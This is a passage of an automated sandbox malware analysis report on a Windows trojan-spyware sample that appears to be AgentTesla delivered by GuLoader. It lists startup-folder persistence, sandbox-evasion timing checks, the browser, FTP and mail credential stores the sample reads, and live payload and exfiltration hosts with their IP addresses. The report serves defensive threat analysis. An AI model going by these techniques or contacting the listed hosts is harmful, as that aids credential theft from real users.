              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\Indbruddene.ObdJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\Inagglutinability.fugJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\bingy.udaJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\molge.gosJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\overissued.reiJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\ramessid.glaJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\triaxiality.genJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeAPI/Special instruction interceptor: Address: 38F88DB
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeAPI/Special instruction interceptor: Address: 1E888DB
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeRDTSC instruction interceptor: First address: 3894E21 second address: 3894E21 instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA9550F3F46h 0x00000008 test edx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeRDTSC instruction interceptor: First address: 1E24E21 second address: 1E24E21 instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA955128EA6h 0x00000008 test edx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeMemory allocated: 32AE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeMemory allocated: 32A30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeAPI coverage: 1.3 %
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405D74
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_0040699E FindFirstFileW,FindClose,2_2_0040699E
              Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002637000.00000004.00000020.00020000.00000000.sdmp, rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeAPI call chain: ExitProcess graph end nodegraph_0-4505
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeAPI call chain: ExitProcess graph end nodegraph_0-4286
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_6FC61BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FC61BFF
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess created: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeQueries volume information: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 4956, type: MEMORYSTR
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: Yara matchFile source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 4956, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 4956, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              2
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              1
              Exfiltration Over Alternative Protocol
              1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              1
              Deobfuscate/Decode Files or Information
              1
              Credentials in Registry
              226
              System Information Discovery
              Remote Desktop Protocol2
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
              Process Injection
              2
              Obfuscated Files or Information
              Security Account Manager311
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              NTDS12
              Virtualization/Sandbox Evasion
              Distributed Component Object Model1
              Clipboard Data
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA SecretsInternet Connection DiscoverySSHKeylogging22
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
              Virtualization/Sandbox Evasion
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              rendel#U00e9s_1023200000000000305.exe13%ReversingLabsWin32.Trojan.Generic
              rendel#U00e9s_1023200000000000305.exe100%AviraHEUR/AGEN.1338455
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.biny0%Avira URL Cloudsafe
              http://ftp.carbognin.it0%Avira URL Cloudsafe
              http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              ftp.carbognin.it
              86.107.36.93
              truetrue
                unknown
                akonnyuszerkezet.hu
                185.33.55.26
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.binfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nsis.sf.net/NSIS_ErrorErrorrendel#U00e9s_1023200000000000305.exefalse
                    high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.binyrendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002674000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ftp.carbognin.itrendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B3D000.00000004.00000800.00020000.00000000.sdmp, rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.33.55.26
                      akonnyuszerkezet.huHungary
                      47381SERVERGARDEN-ASServergardenKftHUfalse
                      86.107.36.93
                      ftp.carbognin.itRomania
                      6910DIALTELECOMROtrue
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1571444
                      Start date and time:2024-12-09 11:50:05 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 5s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:5
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:rendel#U00e9s_1023200000000000305.exe
                      renamed because original name is a hash value
                      Original Sample Name:rendels_1023200000000000305.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@3/9@2/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 93%
                      • Number of executed functions: 148
                      • Number of non-executed functions: 75
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: rendel#U00e9s_1023200000000000305.exe
                      TimeTypeDescription
                      11:50:46Task SchedulerRun new task: {3B0271B5-B01A-4794-82E4-9906C26952B4} path:
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.33.55.26Objedn#U00e1vka_20248481119000903.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                      • akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin
                      FLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                      • romstal-hungary.hu//MIzSja40.bin
                      86.107.36.93Objedn#U00e1vka_20248481119000903.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                        Amalgamers.exeGet hashmaliciousAgentTeslaBrowse
                          FLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              Rendeles_110078670008860000002.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                Rendeles_1100786700088673955430.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  wzjEaheCBP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                    4MQ9rTK7AV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                      Doc22378670008869955430311.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                        doc222378670008869955430341.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          akonnyuszerkezet.huObjedn#U00e1vka_20248481119000903.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 185.33.55.26
                                          ftp.carbognin.itObjedn#U00e1vka_20248481119000903.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 86.107.36.93
                                          Amalgamers.exeGet hashmaliciousAgentTeslaBrowse
                                          • 86.107.36.93
                                          FLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 86.107.36.93
                                          ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 86.107.36.93
                                          Rendeles_110078670008860000002.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          • 86.107.36.93
                                          Rendeles_1100786700088673955430.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          • 86.107.36.93
                                          wzjEaheCBP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          • 86.107.36.93
